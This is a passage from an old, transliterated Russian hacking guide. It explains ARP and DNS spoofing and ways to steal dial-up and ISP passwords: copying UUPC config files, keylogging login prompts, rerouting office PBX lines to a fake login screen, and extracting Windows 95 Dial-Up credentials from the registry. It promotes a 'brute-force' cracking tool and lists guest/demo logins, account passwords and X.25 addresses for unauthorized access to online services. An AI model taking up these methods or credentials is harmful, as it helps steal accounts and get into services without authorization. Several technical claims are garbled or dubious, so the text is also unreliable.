operacionnoj sistemy, baza kotoroj, sobstvenno, i est' set' (autentifikaciya,
avtorizaciya, razgranichenie dostupa, monitoring, audit).
Vprochem, nepravil'naya konfiguraciya takoj sistemy tut zhe ostavlyaet
ogromnuyu bresh' v zashchite seti.
Bolee slozhnaya zashchita seti uzhe zavisit ot professionalov, kotorye
obsluzhivayut set' i osushchestvlyayut poisk i ispravlenie oshibok v operacionnoj
sisteme ili korrektirovanie nekotoryh setevyh ustanovok po umolchaniyu
posredstvom tak nazyvaemogo skanera bezopasnosti sistemy.
Lozhnye DNS-zaprosy v Internet
V lyubom konkretnom sluchae obmen datagrammami v Internet osushchestvlyaetsya
mezhdu dvumya udalennymi hostami posredstvom zagolovka paketa i tak
nazyvaemogo polya dannyh. Zagolovok -- eto, prezhde vsego, identifikaciya, a v
pole dannyh vhodit nekotoryj paket vysokogo urovnya. V chastnom sluchae, lyuboj
IP-paket vhodit v sostav protokola transportnogo urovnya TCP. S drugoj
storony, paket IP yavlyaetsya protokolom kanal'nogo urovnya lokal'noj seti, t.e.
mezhsetevym protokolom, kotoryj pozvolyaet peredavat' datagrammy v set'.
Vstaet vopros ob adresacii peredavaemyh dannyh. Dlya etogo ispol'zuetsya
32-razryadnnyj adres togo zhe protokola IP. Kazalos' by, chto dostatochno
ukazat' v zagolovke IP v standartnom pole Destination Address adres IP
atakuemogo uzla. No eto ne tak. Lyuboj paket IP uzhe soderzhitsya vnutri
appartnogo paketa lokal'noj seti, t.e. lyubaya ataka na host nevozmozhna bez
apparatnoj adresacii peresylaemyh datagramm. |to oznachaet, chto v prostom
sluchae (adresaciya tol'ko v odnoj podseti) dlya ataki na host, kak minimum,
neobhodimo znat' ego adres lokal'noj seti (Ethernet-adres) ili
sootvetstvuyushchij adres marshrutizatora. V etom sluchae, pered lyubym hakerom
vstaet problema udalennogo poiska informacii otnositel'no adresov lokal'noj
seti.
Pust' na atakuemom uzle imeetsya nekotoryj algoritm udalennogo poiska
dannyh. Togda haker vybiraet segment seti, ispol'zuya dyryavyj protokol ARP,
(pust' dazhe tablica ARP v ustanovkah atakuemoj oprecionnoj sistemy nastroena
ves'ma korrektno) posylaet zapros Ethernet na atakuemyj adres i poluchaet
neobhodimoe sootvetstvie mezhdu adresami IP i adresami lokal'noj seti. Nuzhno
skazat', chto etot zapros yavlyaetsya shirokoveshchatel'nym i v nem ukazyvaetsya
adres marshrutizatora, yavlyayushchijsya adresom po umolchaniyu atakuemoj operacionnoj
sistemy. Marshrutizator, u kotorogo vsegda imeetsya spisok ARP s informaciej
(vse dannye vnosyatsya posredstvom togo zhe ARP-protokola) ob adrese IP i
adrese lokal'noj seti, poluchaet zapros, tut zhe vnosit sootvetstvuyushchuyu zapis'
o hoste hakera v spisok ARP i blagopoluchno otpravlyaet hakeru iskomyj adres
lokal'noj seti. |to tol'ko nachalo. Teper' haker perehvatyvaet vyshenazvannyj
ARP-zapros i posylaet v set' lozhnyj ARP-otvet, kotoryj, po suti, i yavlyaetsya
nichem inym, kak hostom! A eto uzhe oznachaet, chto haker vpolne spokojno
kontroliruet setevoj trafik atakuemogo hosta.
Itak, haker prisvaivaet atakuemomu segmentu seti lozhnyj IP-adres,
vhodit v set', nabivaet "tu samuyu" komandu, ustanavlivaet v operacionnoj
sisteme svoj adres IP, posylaet uzhe v svoyu set' shirokoveshchatel'nyj zapros, a
tupoj marshrutizator bezukoriznenno obnovlyaet v svoem spiske adresa takim
obrazom, chto lyubye setevye pakety nachinayut avtomaticheski napravlyat'sya na
apparatnyj adres lokal'noj seti hakera.
Tol'ko dva sub®ekta znayut o tom, kto poluchil shirokoveshchatel'nyj zapros
ARP. Imi yavlyayutsya haker i glupyj marshrutizator, na kotoryj prihodit paket,
neposredstvenno napravlennyj na bezzashchitnyj ( pust' dazhe stoit zanamenityj
FireFall-1 firmy Check Point Software Technologies) adres atakuemogo uzla. I
v samom dele, host-zhertva, nichego ne podozrevaya (soglasno ustanovkam po
umolchaniyu setevoj operacionnoj sistemy) blagopoluchno peredaet datagrammy na
hakerskij uzel ARP, kotoryj, v svoyu ochered', otsylaet prinyatyj paket
setevomu marshrutizatoru, a tot, ponyatno, dozhdavshis' otveta, otsylaet lyubuyu
informaciyu uzhe ne cherez obmanutyj host ARP, a na atakuemyj uzel. Tak kak
polnyj perehvat paketov mezhdu lozhnym serverom i uzlom hakera prohodit v
promezhutochnoj stadii, to voznikaet tak nazyvaemaya petlevaya shema perehvata
informacii. Polnyj perehvat vozmozhen lish' v tom sluchae, kogda hakerskij
server ARP rabotaet po tak nazyvaemoj mostovoj sheme perehvata, soglasno
kotoroj v kachestve hakerskogo zaprosa ARP ukazyvaetsya lyuboj nezanyatyj
(proxy-server) IP-adres atakuemoj seti.
Plavno perehodim k DNS-serveram. Poslednie ispol'zuyut v svoih
obrashcheniyah k udalennym uzlam 32-bitnye adresa IP, mnemonicheski zaklyuchennye v
chetyrehrazryadnuyu bukvennuyu kombinaciyu, ponyatnuyu kazhdomu lammeru. Lyuboj host
mozhet poluchit' sootvetstvuyushchij DNS u blizhajshego informacionnogo servera DNS
po izvestnoj sisteme Domain Name Server cherez setevoj protokol DNS. Prosto
host posylaet zapros na izvestnyj IP-adres DNS-servera svoj IP-adres i imya
servera. Server DNS shtudiruet sobstvennuyu bazu dannyh, nahodit IP-adres i
otpravlyaet na host sootvetstvuyushchij otvet DNS. Shema ves'ma primitivnaya. Esli
zhe server DNS ne nahodit iskomuyu bukvennuyu kombinaciyu, to on otsylaet zapros
na tak nazyvaemyj kornevoj server, kotoryj, v svoyu ochered', sveryaet
informaciyu s fajlom nastroek root.cache. Tak proishodit do teh por, poka imya
hosta ne budet najdeno v Internet.
Variant pervyj. Atakuemaya set' ozhidaet nekotoryj
DNS-zapros. Haker sidit v segmente seti (t.e. on znaet vse parametry
ISSa/ISSb) ili nahoditsya na puti setevogo udalennogo traffika (obychnoe
primenie ftp-komand get, put ili ls). Vnachale haker izvlekaet iz DNS-zaprosa
nomer otpravitelya porta UDP. Uznav, takim obrazom, imya seti, haker posylaet
paket DNS na zahvachennyj UDP-port i uzhe v etom pakete osushchestvlyaet podmenu,
i v konechnom schete polnost'yu perehvatyvaet traffik mezhdu soboj i udalennym
serverom.
Variant vtoroj. Haker, maskiruyas' pod nastoyashchij
DNS-server i ispol'zuya izvestnuyu dyrku (ogranichennost' identificiruemyh
paketov) protokola UDP, napryamuyu peresylaet na atakuemyj uzel ne lozhnyj
zapros DNS, a, naprotiv, lozhnyj DNS-otvet. Atakuemyj server spokojnen'ko
prinimaet IP-adres i, esli on ne sovpadaet s IP-adresom DNS-servera,
DNS-otvet ne identichen DNS-zaprosu, DNS-otvet popal v port DNS-zaprosa (v
krajnem sluchae haker prosto nachinaet perebirat' 1023 vzmozhnyh portov UDP) i,
esli pole identifikatora zaprosa identichno polyu dannyh DNS-otveta, to haker
pronikaet v set' putem vnedreniya fiktivnogo DNS-otveta v atakuemyj host.
Filipp Cimmermann i ego skandal'no izvestnoe detishche Pretty Good Privacy
Rech' idet o samom moshchnom instrumente kriptograficheskoj zashchity --
algoritme shifrovki PGP, mehanizm obrabotki klyuchej kotoroj produman nastol'ko
tshchatel'no, chto vzlom vozmozhen lish' cherez lobovuyu ataku. Krome etogo PGP
ves'ma populyaren i besplatno rasprostranyaetsya cherez Internet. Segodnya
algoritm shifrovki PGP -- ne priznannyj nekotorymi oficial'nymi krugami
standart elektronnoj perepiski.
PGP - programma, rabotayushchaya po tak nazyvaemoj sheme publichnogo i
sekretnogo klyuchej. Publichnyj klyuch mogut uznat' vse. Sekretnyj -- tol'ko
konechnyj pol'zovatel' PGP. Novoe soobshchenie rasshifrovyvaetsya tol'ko cherez PGP
s pomoshch'yu vtorogo sekretnogo klyucha, t.e. soobshchenie zashifrovyvaetsya publichnym
klyuchom, otpravlyaetsya i zatem chitaetsya s ispol'zovaniem sekretnogo klyucha.
PGP 5.0 dlya Windows 95 ili Macintosh mozhno legko skachat' s populyarnogo
servera MIT.
Vzlom Internet
Pod terminom vzlom Internet podpazumevayut neskol'ko pazlichnyh veshchej.
Vo-pepvyh: nezakonnoe podklyuchenie k ppovajdepu i tak nazyvaemye "halyavnye"
podklyucheniya. Kak eto osushchestvlyaetsya? Samyj ppostoj vapiant -- vorovstvo.
Haker kradet chuzhoj papol'. V nashe vpemya ppi ogpomnom kolichestve nedalekih
pol'zovatelej hakeru eto delo ne ppedstavlyaet osobogo tpuda, tak kak
podavlyayushchee bol'shinstvo pol'zovatelej pol'zuetsya takim populyapnym paketom
e-mail kak UUPC CHepnova. A takzhe nekotopye ppovajdepy vse eshche ppedostavlyayut
vhod v sistemu kak online tak i offline pod odnim i tem zhe papolem. Hakeru
ostaetsya samoe ppostoe -- pepepisat' fajl init aka init1 s kataloga \UUPC.
Tam budet ppopisan kak login tak i password.
Bolee slozhnye vapianty vzloma Internet -- zapusk na mashine pol'zovatelya
vipusnoj programmy ili pezidentnoj, otslezhivayushchej poyavlenie stpochki "ogin:".
Dalee v otdel'nyj fajl zapisyvayutsya vse nazhatiya klaviatury.
Esli pol'zovatel' ispol'zuet Windows 95 i pabotaet v Netscape,
ispol'zuya SLIP i PPP, to haker obpashchaet vnimanie na skpipty komand i fajl s
passhipeniem .pwl (papol' zashifpovannyj ppimitivnym metodom DES).
Esli na mashinu pol'zovatelya otsutstvuet dostup, k pesheniyu ppoblemy
haker podhodit dpugim putem. Bol'shaya chast' soedinenij ppihoditsya na
telefonnye linii. Prakticheski v lyubom krupnom ofise toj ili inoj kompanii
imeetsya nebol'shaya ATS. Dlya hakera pepeppogpammipovat' ATS tak chtoby, zvonki
s dannogo nomepa pepepouchivalis' na sebya, ne sostavlyaet osobogo truda. Dalee
zapuskaetsya tepminal'naya ppogpamma BBS s zastavkoj ppovajdepa. Estestvenno,
pol'zovatel' pokupaetsya i vvodit login i password. Dalee vydaetsya massa
oshibok, a zatem liniya razryvaetsya.
Vzlom Internet 2
Okazyvaetsya, chto v Moskve sushchestvuet dva neobychnyh servera,
ppedostavlyayushchie dostup v Internet, prichem, krome obyknovennyh yuzerov,
uslugami etih serverov pol'zuyutsya hakery, frikery i drugoj podobnyj narod.
Rech' idet o CompuServe i America-On-Line.
CompuServe schitaetsya samoj legkoj sistemoj, t.e. legko lomayushchejsya. Dlya
etogo haker nahodit distributivnye diskety s programmnym obespecheniem dlya
dostupa k CompuServe i soft tipa CreditWizard ili Credit Master Comfake,
zatem dozvanivaetsya do Scitor po telefonu 9563589 i spokojno vhodit v set'.
Scitor, kak govoryat hakery, horosh tem, chto dostup k resursam seti
predostavlyaetsya cherez sgenerirovannyj vyshe opisannym sposobom ekkaunt, v to
vremya kak SprintNet vysylaet informaciyu o logine i parole pol'zovatelya na
adres elektronnoj pochty.
V Moskve set' America-On-Line dostupna cherez SprintNet (9280985,
9286344 ili 5789119).
Neponyatno, o chem i chem dumayut sistemnye administratory etih serverov.
Intellektual'nyj vzlomshchik Internet
Lyudi utverzhdayut, chto vzlomat' InterNet vozmozhno, a drugie s krikami
"Lamers must die" pytayutsya dokazat', chto eto prikol i sovsem ne real'no.
Hakery utverzhdayut, chto prishlo vremya postavit' vse tochki nad i.
Vzlom Internet vozmozhen! Prichem sdelat' eto mozhno ne buduchi hakerom i
ne obladaya kakoj-to dopolnitel'noj informaciej -- dostatochno vospol'zovatsya
unikal'noj programmoj InterNet Cracker (nethackers@valimar.poltava.ua).
Veroyatno, ona nikogda ne byla by predstavlena shirokomu krugu
pol'zovatelej i tak by i ostalas' lish' dlya internal usage, no ishodnye
teksty programmy byli ukradeny i v perekompilirovannom vide, s ubrannym
avtorstvom, ee stali prodavat'.
Kak rabotaet eta programma. Kogda pol'zovatel' svyazyvaetsya s uzlom
Internet, dlya vhoda neobhodimo vvesti login (identifikator pol'zovatelya) i
password (ego parol'). V Unix sushchestvuyut tak nazyvaemye hard-coded
(standartnye) identifikatory, poetomu dlya vzloma sistemy hakeru ostaetsya
lish' najti sootvetstvuyushchij parol'.
InterNet Cracker pozvolyaet nahodit' paroli dlya pol'zovatelya s imenem
root pol'zuyas' original'nym metodom brute-force password spoofing
NetHackers.
Esli posle vvoda imeni na zapros login, hakera prosyat vvesti Password,
to eto i budet strokoj, kotoruyu nuzhno ukazat' programme. Posle zapuska,
programma ostaetsya rezidentnoj v pamyati i otslezhivaet poyavlenie na ekrane
priglasheniya vvesti parol'. Zatem aktiviziruetsya procedura podbora.
Primer:
1) inetcrk.exe password
2) haker soedinyaetsya s provajderom
(lyubym DOS-terminalom)
3) poyavlyaetsya zapros imeni login:
4) haker vvodit root
5) poyavlyaetsya stroka password:
Esli vse sdelano pravil'no, budet zapushchen glavnyj modul' programmy. O
ego rabote budet svidetel'stvovat' migayushchij ekran. Podbor parolej nachalsya!
Process podbora mozhet zanyat' ot 1 do 5 minut, v zavisimosti ot kachestva
svyazi i bystrodejstviya komp'yutera. Po okonchanii raboty na ekran budet vydano
neskol'ko variantov parolej. Posle etogo haker nemedlenno preryvaet
soedinenie, chtoby na udalennom komp'yutere ne ostalos' sledov ego raboty.
Esli v processe raboty proishodit obryv svyazi, to vse rezul'taty raboty
budut neverny. Kak pravilo, dlya nahozhdeniya dejstvitel'no nastoyashchego parolya
hakeru trebuetsya provesti neskol'ko takih seansov. Nizkij procent popadanij
mozhet byt' svyazan s osobennostyami shifrovki parolej na uzle provajdera.
Edinstvennym trebovaniem dlya raboty programmy yavlyaetsya ee zapusk pod
operacionnoj sistemoj MS-DOS. InterNet Cracker ne mozhet byt' zapushchen pod
Windows i na komp'yutere na kotorom nahoditsya Windows, t.k. v processe raboty
ispol'zuyutsya nedokumentirovannye funkcii DOS, kotorye ne podderzhivaet
Windows.
Besplatnyj Internet
MTU Inform
CHerez guest/mtu i dialup.mtu.ru
Telefony: 9955555, 9955556.
Caravan
CHerez caravan/caravan www.caravan.ru
Telefon: 9951070.
Caravan 2
CHerez caravan/free i DNS 194.190.218.2
Telefon: 9951070.
Caravan 3
CHerez caravan/demo i DNS 193.232.120.226
Telefon: 3324768.
Caravan 4
CHerez free/caravan
Telefon: 3324768.
Data Force
CHerez 2889340 dlya polucheniya demonstracionnogo dostupa v set'
Telefon: 9566749.
Glas Net
CHerez demo/demo123 ili 2220990 dlya polucheniya demonstracionnogo dostupa
v set'
Telefony: 7194457, 9274111, 9953535.
IBM Net
CHerez e-mail: ispp@patron.com dlya polucheniya demonstracionnogo dostupa v
set'
Telefony: 2586435.
Microdin
CHerez guest/guest
Telefon: 9951001.
Demos
CHerez _demo/demo
Telefon: 9613200.
Mega Electronics
CHerez test/test ili guest/guest i www.mega.ru
Telefon: 9951070.
Paroli Windows 95 dlya Dial-Up Networking
Paroli Windows 95 dlya Dial-Up Networking hranyatsya v zakodirovannom vide
v system.dat i user.dat. Odin iz metodov vytaskivaniya parolya iz etih fajlov
proshche vsego sdelat' s pomoshch'yu reestra. Prosmatrivaem klyuch
HKEY_USERS>Default>RemoteAccess>Addresses, v kotorom propisany vse
soedineniya Dial-Up Networking i kopiruem ih. Dalee obrashchaemsya k klyuchu
HKEY_USERS>Default>RemoteAccess>Profiles i prosmatrivaem spisok profilej dlya
kazhdogo soedineniya. Kopiruem i ih. V rezul'tate poluchaetsya neskol'ko fajlov
s rasshireniem .REG, v kotoryh nahodyatsya vse nastrojki dlya soedinenij, v tom
chisle i zashifrovannye paroli. Perepisyvaem ih v druguyu papku uzhe na
sobstvennyj komp'yuter, zapuskaem ih cherez dvojnoj shchelchok myshi i poluchaem
polnuyu kopiyu Dial-Up Networking so vsemi nastrojkami, nomerami, loginami i
parolyami.
Cet' MSN
MSN mozhno nazvat' global'noj set'yu, tak kak v etoj seti vy mozhete
otpravlyat' i poluchat' elektronnuyu pochtu, podklyuchat'sya k konferenciyam i
razgovoram, zagruzhat' i snimat' fajly. Pri etom, zagruzhaemye vami v set'
fajly i vasha aktivnost' v hode konferencij i razgovorov mogut
rassmatrivat'sya, izmenyat'sya i stirat'sya bez uvedomleniya upravlyayushchim foruma.
CHtoby nastroit' parametry modema dlya raboty v MSN, neobhodimo dvazhdy
shchelknut' piktogrammu MSN na rabochem stole, nazhat' knopku Nastrojka i prosto
perejti k nastrojke modema. Dialogovoe okno svojstv modema v Paneli
upravleniya mozhno ne ispol'zovat', tak kak parametry MSN imeyut bolee vysokij
prioritet.
Esli u vas voznikli problemy pri popytke registracii v MSN, znachit v
vashem regione otsutstvuet telefonnyj nomer dlya besplatnoj registracii.
Poprobujte v dialogovom okne Nastrojka podklyucheniya nazhat' knopku
Telefony, zatem knopku Izmenit', vybrat' nomer vashego regiona i povtorit'
popytku soedineniya.
Esli ustanovit' soedinenie tak i ne udaetsya, obratites' v sluzhbu
podderzhki Microsoft.
Konferencii pol'zovatelej MSN neskol'ko otlichayutsya ot konferencij
Usenet global'noj komp'yuternoj seti. V MSN gruppy konferencij yavlyayutsya odnoj
iz uslug seti MSN. Stat'i etih konferencij nikem ne recenziruyutsya i ne
predusmatrivayut kakoj-libo otvetstvennosti avtorov podobnyh statej.
V chastnosti, eto oznachaet, chto MSN ne imeet sobstvennogo servera
novostej s protokolom NNTP. Vy ne mozhete posredstvom prilozhenij tipa Trumpet
Newsreader ili Forte Agent poluchit' dostup k konferenciyam MSN.
MSN sredi prochih vozmozhnostej vklyuchaet dostup k Internet. MSN polnost'yu
integrirovana s obozrevatelem Microsoft Internet Explorer 4.0 i snabzhena
ryadom funkcij, prizvannyh uluchshit' vashe setevoe puteshestvie.
Esli vy vidite ALT v papke \Internet Newsgroups\Popular Newsgroups,
znachit vy imeete polnyj dostup k resursam global'noj komp'yuternoj seti. Po
umolchaniyu, t. e. srazu posle ustanovki MSN, vy imeete lish' ogranichennyj
dostup k resursam Internet.
Esli u vas net uchetnoj zapisi v Internet, prosto zaregistrirujtes' v
Microsoft Network.
Dlya etogo dostatochno vospol'zovat'sya raspolozhennym na rabochem stole
znachkom MSN i sledovat' poyavlyayushchimsya na ekrane ukazaniyam.
CHtoby vy smogli vojti v MSN cherez svoego postavshchika uslug Internet,
korporaciya Microsoft razrabotala novuyu tehnologiyu dostupa Third Party Access
(TPA). |ta tehnologiya pozvolyaet vam oplachivat' vremya, provedennoe v seti
MSN, tol'ko vashemu provajderu.
Vy mozhete poluchit' dostup k seti MSN iz Internet, ispol'zuya dazhe versiyu
MSN 1.2.
CHtoby vojti v set' MSN cherez vashego postavshchika uslug Internet, on
dolzhen podderzhivat' protokol Point-to-Point Protocol (PPP) bez kakih-libo
scenariev, t. e. v rezhime PPP ne dolzhno ispolnyat'sya nikakih komand. Esli vash
provajder otvechaet etim trebovaniyam, prodelajte sleduyushchie shagi:
n Otkrojte papku Udalennyj dostup k seti i sozdajte
soedinenie s vashim postavshchikom uslug Internet
posredstvom mastera Novoe soedinenie
n Ustanovite svyaz' s vashim provajderom i vojdite v
Internet
n Vojdite v rezhim komandnoj stroki MS-DOS i naberite
ping www.msn.com. Esli vy poluchili dostup k web-uzlu
MSN, to vy uvidite chto-to pohozhee na eto:
Pinging machine-name IP-address with 32 bytes of data
n Teper' shchelknite levoj klavishej myshi na piktogramme
MSN, otkrojte dialogovoe okno svojstv Settings, vyberite
connect Using Another Internet Access Provider, nazhmite OK,
a zatem Connect
Esli vy ispol'zuete Microsoft Network v kachestve dostupa k Internet i
yavlyaetes' chlenom MSN, vy mozhete imet' polnyj dostup k konferenciyam
pol'zovatelej Internet cherez MSN. S drugoj storony MSN i Microsoft Internet
Explorer ispol'zuyut razlichnye protokoly Usenet, poetomu vy ne smozhete v
obozrevatele Microsoft Internet Explorer chitat' i publikovat' stat'i v
konferenciyah Internet cherez MSN.
Ispol'zujte dlya etogo v MSN resurs Newsreader.
Vy mozhete sovmestno ispol'zovat' prilozhenie telnet, rabochee soedinenie
TCP/IP i set' MSN.
Dlya dostupa v telnet cherez MSN vam neobhodimo:
n Ustanovit' prilozhenie Udalennyj dostup k seti
n Ustanovit' MSN 1.2 ili vyshe
Zapustit' iz papki Windows utilitu telnet.exe tol'ko posle togo, kak
budet realizovano soedinenie TCP/IP.
Vy mozhete vojti v MSN cherez vashego provajdera ili vojti v Internet
posredstvom uslug MSN. Dlya etogo otkrojte papku Set'.
Ustanoviv komponenty Klient dlya setej Microsoft Network, Kontroller
udalennogo dostupa i TCP/IP, dobav'te k nim protokoly NetBEUI i IPX/SPX
sovmestimyj protokol. V kontrollere udalennogo dostupa dlya TCP/IP v kachestve
tipa drajvera ukazhite Drajver NDIS dlya rasshirennogo rezhima, a sami svojstva
protokola TCP/IP nastrojte tak:
n IP-adres: Poluchit' IP-adres avtomaticheski
n Privyazka: Klient dlya setej Microsoft Network
n SHlyuz: Nezapolnennyj
n Konfiguraciya WINS: Vklyuchite raspoznavanie WINS,
dobav'te svoj server, naprimer 204.118.34.6 ili
204.118.34.11 i otklyuchite ispol'zovanie DHCP dlya
raspoznovaniya WINS
n Konfiguraciya DNS: Otklyuchit' DNS
Ostav'te vashe pervoe soedinenie udalennogo dostupa v pokoe i nastrojte
vtoroe soedinenie udalennogo dostupa. V kachestve tipa servera udalennogo
dostupa ukazhite
PPP: Internet, Windows NT Server, Windows 98, a v dopolnitel'nyh
parametrah otmet'te Programmnoe szhatie dannyh. V kachestve dopustimyh setevyh
protokolov ukazhite tol'ko TCP/IP. V nastrojkah TCP/IP opcii IP-adres i
Adresa vvodyatsya vruchnuyu vyberite v zavisimosti ot instrukcij vashego
postavshchika uslug Internet. Krome etogo, soobshchite sisteme ispol'zovat' szhatie
zagolovkov IP i standartnyj shlyuz dlya udalennoj seti.
Pomnite, chto server www.msn.com k uslugam MSN imeet otnoshenie ves'ma
otdalennoe.
Set' Sprint Network
Set' SprintNet -- global'naya set' kommutacii paketov, odna iz
krupnejshih v mire v nastoyashchee vremya. Cet' Sprint yavlyaetsya neposredstvennym
razvitiem seti Telenet -- odnoj iz pervyh obshchedostupnyh setej kommutacii
paketov.
Vladel'cami seti yavlyayutsya krupnye amerikanskie kommunikacionnye
kompanii
UTI i GTE. Ih dochernej kompanii US Sprint prinadlezhit krupnejshaya v mire
set' optovolokonnyh kanalov, sostavlyayushchaya osnovu Sprint. K Sprint podklyucheno
okolo 6000 host-komp'yuterov i shlyuzov (gates) drugih firm i organizacij,
predostavlyayushchih raznoobraznye spravochno-informacionnye uslugi i
obespechivayushchih vyhod v drugie seti.
|ta set' schitaetsya bezopasnoj, tak kak pri rabote s nej nevozmozhna
poterya informacii. Pri rabote s elektronnoj pochtoj vam predostavlyaetsya
special'nyj "yashchik" na servere, kotoryj podklyuchen s pomoshch'yu teleprocessora k
sisteme elektronnoj pochty. Sama sistema maksimal'no produmana i imeet massu
komand. Pod nee takzhe est' i licenzionnoe programmnoe obespechenie, kotoroe
stavitsya na vash komp'yuter vmeste s set'yu.
Rabota s set'yu Sprint vedetsya s pomoshch'yu protokola H25, kotoryj
obespechivaet pol'zovatelyam virtual'nyj kanal. |to znachit, chto kazhdyj port
seti imeet svoj adres, i esli na drugom adrese nahoditsya komp'yuter, to
zaprosto mozhno k nemu podklyuchit'sya. Dlya peredachi vse dannye razbivayutsya na
porcii i peredayutsya otdel'nymi liniyami po odnomu kanalu. Kompleks Sprint
effektivno ispol'zuet sistemy svyazi, udeshevlyaya stoimost' zadejstvovannyh
resursov i pri etom pozvolyaet uskorit' rabotu s set'yu.
Deviz Sprint -- konfidencial'nost'. Fizicheski i apparatno nevozmozhno
prosledit' informaciyu, peredavaemuyu set'yu. O soderzhanii fajlov smogut uznat'
tol'ko te, komu oni neposredstvenno prednaznachayutsya. Nikto nikogda ne uznaet
adresa, imeni i drugih svedenij o vas, esli vy etogo ne pozhelaete.
Zvonok na Sprint osushchestvlyaetsya samoj obychnoj tepminalnoj programmoj.
Vy nabipaete nomep Sprint (928-6344, 928-0985, 342-8376, 913-7166, 578-9119
ili 578-9161) i posle soedineniya tepminal govopit CONNECT 9600/ARQ/V34b.
Dal'she vam sleduet nabpat' @D i nazhat' enter. Vyvedutsya stpoki:
SPRINT NETWORKS
772 11001A
TERMINAL=(vvedite D1)
772 -- eto kod stpany, po Rossii i SHG. 11001A -- eto nomep hosta, s
kotopogo vy voshli. To est', poluchiv otvet nappimep 772 11001F vy dolzhny
podozpevat', chto sushchestvuyut hosty 11001A,B,C,D. To est', vozmozhno sushchestvuyut
eshche telefony Sprint v vashem gopode.
Posle @ vy dolzhny nabpat' nomep seti -- NUA -- Network User Address,
t.e. chislo, zadayushchee setevoj adres pol'zovatelya. NUI (Network User
Identificator) -- kod dostupa i parol'. DNIC (Data Network Identification
Code) -- kod seti, predstavlyaet iz sebya chetyre cifry, kotorye v polnom
setevom adrese zadayut kod seti dannyh.
Esli u vas net ID i parolya, poppobujte vvesti sleduyushchee:
login: guest/demo/new/bbs/help/info/newuser/anonymous/test
passw: guest/demo/new/bbs/help/info/newuser/anonymous/test
Sprint vhodit v sostav konsopciyma Global One, kak i drugie krupnye
seti kommutacii paketov: SITA aka SCITOR, Infonet, Tymnet i drugie. Global
One imeet ppedstavitel'stvo (kak elektponnoe tak i fizicheskoe) v kazhdoj
kpypnoj stpane (modemnyj telefon: 967-6767, golosovoj telefon: 705-9170,
adpes domena: global-one.net)
Esli haker vzlomaet imenno sppintovyj xost, to ego mogut i privlech', no
eto v eavisimosti ot togo kak gluboko on zalez, i znayut ob etom ili net. A
esli haker paskovypyal kakuyu-libo setku ili chto-nibud' eshche chepez Sprint, to
vpyad li. Sprint naplevat' kto chepez nego bpodit. Ppoblemy mogut vozniknut'
ot togo k komu zalez haker.
V Internet mozhno uznat' ob uslugah seti Sprint cherez
http://www.sprint.com, http://www.sprintlink.net ili http://www.rosprint.ru.
CHerez Sprint dostupny sleduyushchie sluzhby:
CompuServe Network
Address: 202 202
User ID: 177000,1005
Password: EXPLORE/WORLD
Program: WinCIM v3.0
Dlya soedineniya s Compuserve Network (a ne s samim Kompuservom) cherez
Sprint, nuzhno vvesti te zhe X.25 adresa (chto i dlya Kompuserva), no s
ukazaniem pyatogo porta: 202201E (ili 202201.05), 202202E, 202203E, 614227E.
Kak poyavitsya priglashenie Host, vvedite mnemoniku N2KRF1.
Microsoft Network
Address: 03110 83501000
Program: MSN v5900
America On-Line
Address: 83420178.83
User name: 2230033368
Password: ELITES-GOLF
Program: America On-Line v3.0
GEnie
Address: unpublished
User ID: only god knows
Program: telix
Ckanirovanie Sprint -- posledovatel'nyj perebor adresov (NUA). Delat'
eto vruchnuyu ochen' dolgo -- dlya etogo ispol'zuyutsya raznoobraznye programmy
ili skripty.
Luchshaya -- Sprintnet Scanner v1.5.
Set' Dialog
Dialog yavlyaetsya odnoj iz samyh obshirnyh informacionnyh sluzhb. Na
segodnyashnij den' Dialog predostavlyaet dostup k bolee chem 600 bazam dannyh. V
Rossii sushchestvuet neskol'ko setej, imeyushchih svobodnyj (Reserved Charging)
vyhod na sluzhbu Dialog i dazhe rabotaet mnemonika (DIALOG)! Coedinit'sya s
Dialogom mozhno cherez SprintNet (mnemonika: DIALOG, X.25 adresa:
0311041500048, 0311041500049, 0311041500020). Posle soedineniya vy uvidite
priglashenie: DIALOG INFORMATION SERVICES. Login, kak pravilo, yavlyaetsya
shestiznachnym nomerom, a paroli obychno imeyut dlinu vosem' znakov (bol'shie i
malen'kie bukvy chereduyutsya s chislami). Esli parol' ugadan, to posle
nekotoryh soobshchenij vy poluchite prompt - "?"
Nomera nekotoryh baz dannyh seti Dialog:
75 Management Contents
201 ERIC
204 CA Search
205 BIOSIS Privews
208 Compendex
213 INSPEC
215 ABI/INFORM
216 PTS Prompt
229 Drug Information
231 CHEMNAME
247 Magazine Index
250 CAB Abstracts
254 Medline
290 Dialindex
296 TrademarkScan
K etim bazam dannyh vozmozhen dostup s pomoshch'yu klientskogo softa Knight
Reader i Dialoglink:
ftp://iserv.dialog.com/pub/WWW/quickstart/setup.exe
ftp://iserv.dialog.com/pub/WWW/dlkdos.exe
ftp://iserv.dialog.com/pub/WWW/dlkdos.zip
ftp://iserv.dialog.com/pub/WWW/dlkwin.exe
Tehnicheskaya podderzhka Dialoga dostupna besplatno cherez rossijskih
operatorov MCI ili AT&T ili Sprint Global-One.
Set' Homegate
Homegate -- yavlyaetsya dochernej kompaniej I-Pass i predostavlyaet dostup k
Internet prakticheski vo vseh stranah mira po protokolu H.28 cherez Sita
network, BBN Network i UUNET. V Rossii set' Homegate dostupna cherez set'
Sita NetWork (Equant). Dialer soedinyaet vas s serverom korporacii I-Pass,
gde i proishodit proverka parolya. Dlya prohozhdeniya registracii v Homegate
neobhodimo uzhe imet' vhod v Internet, i nahodyas' na linii zapustit' Homegate
Dialer, zatem nazhat' v dialere knopku Register (zapustitsya brauzer i
soedinit hakera s sajtom registracii).
Posle prohozhdeniya registracii hakeru budet poslan fajl s ID i parolem.
Kreditka proveryaetsya ne vo vremya, a posle prohozhdeniya registracii, v
techenii 10-20 minut, poetomu podbirat' prefiksy -- gibloe delo. Haker
uznaet, proshel on registraciyu ili net tol'ko po istechenii etogo vremeni,
pozvoniv s pomoshch'yu Homegate Dialer.
Esli haker voshel v Internet , to prohodit' registraciyu neobhodimo
kazhdye dva dnya, tak kak vse dogovora, zaklyuchennye v Rossii, preryvayutsya dlya
"rassledovaniya".
CHtoby ne pereustanavlivat' Homegate Dialer dlya povtornoj registracii,
hakeru dostatochno udalit' fajly user.idx i user.dat.
Esli pis'mennyj anglijskij hakera dostatochno krasnorechiv, chtoby ubedit'
administraciyu seti Homegate v tom, chto on amerikanec, nahoditsya v Rossii i
vozmushchen podobnym nebrezhnym otnosheniem, to hakeru bez osobyh problem,
obratno aktiviruyut dostup.
Pis'mo pishetsya ne v HELPDESK@HOMEGATE.COM, a pryamo na tot adres s
